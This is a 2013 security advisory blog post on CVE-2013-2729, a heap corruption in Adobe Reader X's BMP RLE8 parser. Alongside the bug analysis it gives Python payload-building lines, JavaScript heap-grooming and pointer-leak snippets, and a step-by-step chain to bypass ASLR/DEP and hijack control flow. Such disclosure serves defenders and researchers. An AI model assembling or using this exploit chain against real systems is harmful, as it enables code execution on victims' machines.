Tuesday, May 14, 2013

Adobe Reader BMP/RLE heap corruption - CVE-2013-2729

Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes Protected Mode, a sandbox technology similar to the one in Google Chrome, which improves the overall security of the product.
  • Title: Adobe Reader BMP/RLE heap corruption
  • CVE Name: CVE-2013-2729
  • Permalink: http://blog.binamuse.com/2013/05/readerbmprle.html
  • Date published: 2013-05-14
  • Date of last update: 2013-05-14
  • Class: Client side Integer Overflow
Adobe Reader X fails to validate its input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process has been proven possible after a malicious BMP image triggers a heap overflow. Quick links: White paper, Exploit generator in Python and PoC.pdf for Reader 10.1.4.

Vulnerability Details

The issue presented here is related to the parsing of a BMP file compressed with RLE8. The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive PDF form. The DLL responsible for handling the embedded XFA interactive forms (and the BMP) is the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code.

PDF Forms

A PDF file can contain interactive Forms in two flavors:
  • The legacy, Forms Data Format (FDF or AcroForms)
  • The XML based, XML Forms Architecture (XFA)
There is support for different XFA Specifications since Acrobat 8.0 (ref. http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html).
XFA Version    Acrobat Version
2.6            Acrobat 8.1/Acrobat 8.11
2.7            Acrobat 8.1
2.8            Acrobat 9.0, Acrobat 9 ALang features
3.0            Acrobat 9.1
3.3            Acrobat 10.0
We will focus on the latest XFA specification available.

XFA, The XML Forms Architecture

The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules that allow businesses to build interactive forms. At its simplest, a template-based grammar defines fields in which a user provides data. Among others, it defines buttons, text fields, choice lists, images and a scripting API to validate the data and interact with it. It supports JavaScript, XSLT and FormCalc as scripting languages. A small XFA containing an image looks like this:
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/">
   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageArea name="Page1" id="Page1">
         <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
         <medium stock="default" short="612pt" long="792pt"/>
      </pageArea>
      <subform w="576pt" h="756pt">
         <field name="ImageField">
            <imageEdit data="embed"/>
            <image> AAAAA.. AAAAAA</image>
         </field>
      </subform>
   </subform>
</template>
An XFA form can be embedded in an ordinary PDF stream and be rendered by all modern versions of Adobe Reader. The PDF catalog must contain the /NeedsRendering, /Extensions and /AcroForm fields. The /AcroForm field must point to the form dictionary. Something like this:
3 0 obj
    << /Length 12345 >>
stream
    ... XFA XML goes here ...
endstream
endobj
2 0 obj
    << /XFA 3 0 R >>
endobj
1 0 obj
    <<  /Type /Catalog
        /NeedsRendering true
        /AcroForm 2 0 R
        /Extensions <<
                      /ADBE <<
                              /BaseVersion /1.7
                              /ExtensionLevel 3
                            >>
                    >>
    >>
endobj
Graphically, a PDF containing an XFA form has this structure:
[Figure: structure of a PDF containing an XFA form]
At this point we can build a PDF containing an XFA form that contains an image. Let's see the BMP bug.

BMP - Run length encoding

BMP RLE8 data can be encoded in two modes, absolute mode and RLE mode, and both modes can occur anywhere in a single bitmap (ref. http://www.fileformat.info/format/bmp/corion-rle8.htm). The RLE mode is a simple run-length mechanism: the first byte contains the count and the second byte the pixel value to be replicated. If the count byte is 0, the second byte is a special command, such as end of line or delta. In absolute mode, the second byte contains the number of bytes to be copied literally. Each absolute run must be word-aligned, which means an additional padding byte, not included in the count, may have to be added. After an absolute run, RLE compression continues.
Second byte    Meaning
0              End of line
1              End of bitmap
2              Delta. The next two bytes are the horizontal and vertical offsets from the current position to the next pixel.
3-255          Switch to absolute mode
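To make the encoding concrete, here is a minimal sketch of an RLE8 expander in Python that validates every move and every write. It is not Adobe's code: the function name `decode_rle8` and its error messages are hypothetical, and it follows the row convention of the pseudocode in this post (start at the last row, end of line and delta decrement the row index).

```python
def decode_rle8(data: bytes, width: int, height: int) -> bytearray:
    """Expand RLE8 data into a width*height buffer, rejecting out-of-range moves."""
    pixels = bytearray(width * height)
    x, y = 0, height - 1                      # same starting row as the pseudocode
    i = 0
    while i + 1 < len(data):
        count, value = data[i], data[i + 1]
        i += 2
        if count:                             # RLE mode: repeat value count times
            if not (0 <= y < height and x + count <= width):
                raise ValueError("encoded run outside image")
            start = y * width + x
            pixels[start:start + count] = bytes([value]) * count
            x += count
        elif value == 0:                      # end of line
            x, y = 0, y - 1
        elif value == 1:                      # end of bitmap
            return pixels
        elif value == 2:                      # delta: validate the new position
            if i + 1 >= len(data):
                raise ValueError("truncated delta")
            x, y = x + data[i], y - data[i + 1]
            i += 2
            if not (0 <= y < height and x <= width):
                raise ValueError("delta outside image")
        else:                                 # absolute mode: copy value literal bytes
            if not (0 <= y < height and x + value <= width):
                raise ValueError("absolute run outside image")
            if i + value > len(data):
                raise ValueError("truncated absolute run")
            start = y * width + x
            pixels[start:start + value] = data[i:i + value]
            x += value
            i += value + (value & 1)          # skip the word-alignment padding byte
    return pixels


# A 3x2 image: one encoded run, end of line, one absolute run, end of bitmap.
sample = bytes([3, 0xAA, 0, 0, 0, 3, 1, 2, 3, 0, 0, 1])
print(decode_rle8(sample, 3, 2).hex())
```

Because Python integers do not wrap around, the position checks in this sketch cannot be bypassed by an arithmetic overflow; a delta that leaves the image is rejected immediately.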

Bug pseudocode

Consider the following C listing. This pseudocode is derived from the function responsible for expanding an RLE encoded BMP, found in AcroForm.api. The functions feof(), fread() and malloc() are the usual ones. The stream is a file from which the complete BMP header, including the height and the width, has already been read. The main purpose of the function is to expand the RLE encoded data. First it allocates enough memory to hold the complete image. Then it reads two bytes, a count and a value, and uses the count to decide between the two modes: RLE or absolute. In the RLE mode (nonzero count) it repeats the value byte count times. In the absolute mode (count equal to zero) there are more options, selected by the value byte and implemented as a switch:
  • 0. End of line, resets the xpos/ypos indexes to point to the start of the next line.
  • 1. End of bitmap, finishes processing.
  • 2. Delta, moves the write pointer (e.g. to skip blank regions).
  • d. Literal data, copies d bytes literally from the file.
Test yourself and try to find the bug here:
  1. char* rle(FILE* stream, unsigned height, unsigned width){
  2.   assert(height < 4096 && width < 4096);
  3.   char * line;
  4.   char aux;
  5.   unsigned count;
  6.   struct {
  7.      unsigned char reps;
  8.      unsigned char value;
  9.   }cmd;
  10.   unsigned char xdelta, ydelta;
  11.   unsigned xpos = 0;
  12.   unsigned ypos = height - 1;
  13.   char * texture = malloc(height*width); //Safe mult!
  14.   assert(texture);
  15.   while ( !feof(stream)) {
  16.     fread(&cmd, 1, 2, stream);
  17.     if ( cmd.reps ) {
  18.       assert ( ypos < height && cmd.reps + xpos <= width );
  19.       for(count = 0; count<cmd.reps; count++) {   //RLE Mode, repeat the value
  20.           line = texture+(ypos*width);
  21.           line[xpos++] = cmd.value;
  22.         }
  23.     }
  24.     else {  // if rep is zero then value is a command
  25.         switch(cmd.value){
  26.             case 0:                          //End of line
  27.                 ypos -= 1;
  28.                 xpos = 0;
  29.                 break;
  30.             case 1:                          //End of bitmap. Done!
  31.                 return texture;
  32.             case 2:                          //Delta case, move bmp pointer
  33.                 fread(&xdelta, 1, 1, stream); // read one byte
  34.                 fread(&ydelta, 1, 1, stream); // read one byte
  35.                 xpos += xdelta;
  36.                 ypos -= ydelta;
  37.                 break;
  38.             default:                         // literal case
  39.                 assert ( ypos < height && cmd.value + xpos <= width );
  40.                 for(count = 0;count < cmd.value; count++){
  41.                     fread(&aux, 1, 1, stream);
  42.                     line = texture+(width*ypos);
  43.                     line[xpos++] = aux;
  44.                   }
  45.                 if ( cmd.value & 1 )             // padding
  46.                   fread(&aux, 1, 1, stream);
  47.         }//switch(cmd.value)
  48.     }//if (cmd.reps)
  49.   }//while(!feof(stream))
  50.   return texture;
  51. }
As you probably found out, there are no asserts in the "delta" case (line 32). So we can move the destination pointers arbitrarily, even outside the limits of the texture buffer. However, there are boundary checks when you actually try to write something to the texture buffer, as in line 39.
Note that this leaves a corner case in which a heap overflow condition can be triggered. Suppose we repeatedly send delta commands advancing the xpos index, and we continue to do so without trying to write anything until xpos gets really big, for example 0xffffff00. To accomplish this, the BMP should contain 0xffffff00/0xff delta commands, each one incrementing xpos by 0xff, like this:
    bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) // 0xff)
Then, after one more delta that pads xpos up to the desired position, we pass a literal command to actually write up to 0xff bytes of data directly from the file to the pointed address. Because xpos+len(payload) wraps around the 32-bit integer representation, the boundary assertion still holds and the out-of-bounds write goes through.
    bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
    bmp += '\x00'+chr(len(payload))+payload
Summing up, using this bug we can overwrite up to 0xff (255) bytes immediately before the texture buffer.
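The wraparound can be checked with a small model of the 32-bit unsigned arithmetic used by the C pseudocode. This is only a sketch: `payload_len` and `width` are hypothetical example values, and `check_passes` mirrors the assertion `cmd.value + xpos <= width` rather than any real Adobe function.

```python
MASK32 = 0xFFFFFFFF


def u32(value: int) -> int:
    """Truncate a Python integer to an unsigned 32-bit value, like C unsigned."""
    return value & MASK32


def check_passes(xpos: int, length: int, width: int) -> bool:
    """Model of the C test `cmd.value + xpos <= width` on 32-bit unsigned ints."""
    return u32(xpos + length) <= width


payload_len = 0x40   # hypothetical payload size (must be between 3 and 0xff)
width = 0x12C        # hypothetical image width

# Number of '\x00\x02\xff\x00' delta commands, each adding 0xff to xpos.
n_deltas = (0xFFFFFFFF - 0xFF) // 0xFF
xpos = u32(n_deltas * 0xFF)

# Final delta: move xpos to exactly payload_len bytes below the wrap point.
xpos = u32(xpos + (0x100 - payload_len))

print(n_deltas)                               # 16843008 delta commands
print(n_deltas * 4)                           # 67372032 bytes of delta commands
print(hex(xpos))                              # 0xffffffc0
print(check_passes(xpos, payload_len, width)) # True: the sum wraps to 0
print(xpos - (1 << 32))                       # -64: offset seen as a signed value
```

An honest large position fails the same test: with xpos = 0x200 and the same width, `check_passes` returns False, which is why the write only slips through when the sum wraps.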

Exploitation details

The texture is allocated on the heap using the width and height found in the BMP header. So we control the size of the overflowable allocation, and we need to choose it wisely to overwrite something useful. But first, to increase reliability, it is better to prepare the heap with a sequence of allocations. We use the well-known javascript method for allocating and freeing heap chunks. The exploitation script would go like this:
  • Allocate 1000 chunks of size 0x12C filled with controlled data. This very likely enables the LFH (Low Fragmentation Heap) for size 0x12C; 0x12 (18) consecutive allocations guarantee that the LFH is enabled for a given size.
  • Free one out of every 10 of the previously allocated chunks, generating several holes separated by 10 chunks from each other.
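The resulting layout can be pictured with a toy model. The sketch below does not touch any real heap; it only tracks which of the 1000 slots are still allocated, and it assumes (the text does not say) that freeing starts at index 0. The names `groom_layout`, `TOTAL_CHUNKS` and `STRIDE` are hypothetical.

```python
TOTAL_CHUNKS = 1000   # number of sprayed chunks, from the text
STRIDE = 10           # one chunk out of every ten is freed


def groom_layout(total: int = TOTAL_CHUNKS, stride: int = STRIDE) -> list:
    """Return one flag per chunk: True = still allocated, False = freed hole."""
    live = [True] * total
    for index in range(0, total, stride):   # assumption: freeing starts at index 0
        live[index] = False
    return live


layout = groom_layout()
holes = [i for i, alive in enumerate(layout) if not alive]
print(len(holes))    # 100 holes
print(holes[:3])     # [0, 10, 20]
```

In this model every hole is followed by a chunk that is still allocated, which is the property the text relies on: whatever lands in a hole sits next to controlled data.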
It has been found that a structure of size 0x12C bytes is used after the decoding of all images. It contains pointers to the specific vtables and functions. The goal is to read and write this structure from javascript.

Leak an address to javascript, read the struct

To achieve our goal, we first need to leak some pointer to the javascript interpreter so we can bypass ASLR and DEP. In order to learn the address of some DLLs we need to be able to read an object structure from javascript. To get this we'll load a broken BMP image that corrupts an LFH chunk header, thus tricking the allocator into believing that the memory of a live javascript string is free.
  • Load a broken BMP with dimensions {1, 0x12C}. Its pixel texture (of size 0x12C) will most likely be allocated in one of the previously prepared holes.
  • An exception in the RLE decoder will delete all the used structures. In particular, the image texture chunk is freed. As its header is corrupted, this deletion will in fact free the previous chunk and leave the texture chunk alone. This wrongly freed chunk is still used by the javascript interpreter: one of the string objects living in the javascript interpreter still holds a pointer to the recently freed chunk.
    If you can overflow into a chunk that will be freed, the SegmentOffset in the heap chunk header can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated. See https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf
    At this point we have a javascript string using memory that is known to be free. An allocation of 0x12C bytes will probably be assigned to the same memory, overlapping the javascript string. We aim for a javascript string to share the same memory with an object containing vtables, so we can learn the location of some DLL from the js interpreter. As we have chosen the chunk size carefully, this happens automatically and an interesting object gets allocated in the memory actually pointed to by one of the javascript strings.
  • Now let's iterate over all javascript strings looking for the one that has changed:
    for (i=0; i < spray.size; i+=1)
       if ( spray.x[i] != null  &&
           spray.x[i][0] != "\u5858"){
       ...
       }
  • If found, parse its contents and discover the address of AcroRd32.dll:
    acro = (( util.unpackAt(spray.x[i], 14) >> 16) - offset) << 16;
    break;
At this point we have pinpointed the exact string index that shares the memory with an imgstruct and leaked the address of AcroRd32.dll to the javascript interpreter.
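The address arithmetic in the last snippet can be illustrated in Python. The implementation of util.unpackAt is not shown in this post, so the sketch assumes it reads a 32-bit little-endian value starting at a given 16-bit character index; the leaked pointer 0x6A4B1234 and the offset 0x4B are made-up example values, not real addresses from AcroRd32.dll.

```python
import struct


def unpack_at(s: str, pos: int) -> int:
    """Assumed behaviour of util.unpackAt: read a little-endian 32-bit value
    starting at 16-bit character index pos of the string s."""
    raw = s.encode("utf-16-le", errors="surrogatepass")
    return struct.unpack_from("<I", raw, pos * 2)[0]


def module_base(leaked_ptr: int, offset: int) -> int:
    """Drop the low 16 bits of the pointer, subtract the known distance
    (in 64 KiB units) from the module start, and shift back."""
    return ((leaked_ptr >> 16) - offset) << 16


# Hypothetical string: 14 untouched filler characters followed by a pointer.
corrupted = "\u5858" * 14 + "\u1234\u6a4b"
leaked = unpack_at(corrupted, 14)
print(hex(leaked))                      # 0x6a4b1234
print(hex(module_base(leaked, 0x4B)))   # 0x6a000000
```

The shift by 16 bits works because DLLs are loaded at 64 KiB-aligned addresses, so only the upper half of the leaked pointer is needed to locate the module.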

Overwrite the struct

In javascript, strings are simply not writable. You need to free the old string and make a new copy of the string with the modifications you like. Usually, if the new string is the same size as the old one, it will be allocated in the same spot. So to change the object contents we need to free the selected javascript string and allocate another one in the same memory with different content.
  • Free the selected javascript string (which shares memory with the object).
  • Build a new string of length 0x12C with the desired content using the leaked addresses.
  • Allocate several copies of the new string, spraying it a bit so that one of them eventually lands over the desired object.
The object is most likely replaced by a new one pointing to a ROP sequence.

Controlling the execution flow

Calling the doc.close() function from the js interpreter triggers the unloading of all loaded XFA images and the use of the overwritten vtable. Thus the replaced pointers in the object are used once more in the destructors, and the control flow is captured. One last step involves heap spraying a pointer bed at a known address. A more specific technique (provided upon request), in which other heap addresses are leaked to the interpreter, does not need this step.
